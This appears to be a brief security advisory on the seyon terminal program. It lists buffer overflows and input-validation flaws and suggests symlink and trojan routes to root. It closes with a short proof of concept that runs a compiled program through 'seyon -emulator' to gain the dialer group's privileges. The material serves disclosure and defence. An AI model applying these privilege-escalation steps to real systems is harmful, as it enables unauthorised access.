Vuln #1 The Seyon Mess

To summarize: Seyon was supposedly not meant to run with additional
privileges. There are numerous problems with seyon and I've probably not
found all of them. They are:

Buffer Overflows:
 1. $HOME
 2. seyon -emulator $BUF
 3. seyon -modems $BUF
 4. many long text box input string overflows while in program
Input Validation:
 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
 fullprivs (as noted in previous advisory)
 2. seyon -emulator /program/to/execute/with/full/privs

These privileges might be upgradable to root if you are able to a.
trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or
similar c. snoop device i/o.


One of the methods to exploit seyon is shown below:

 bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
 bash-2.03$ gcc -o id id.c
 bash-2.03$ seyon -emulator ./id
 uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)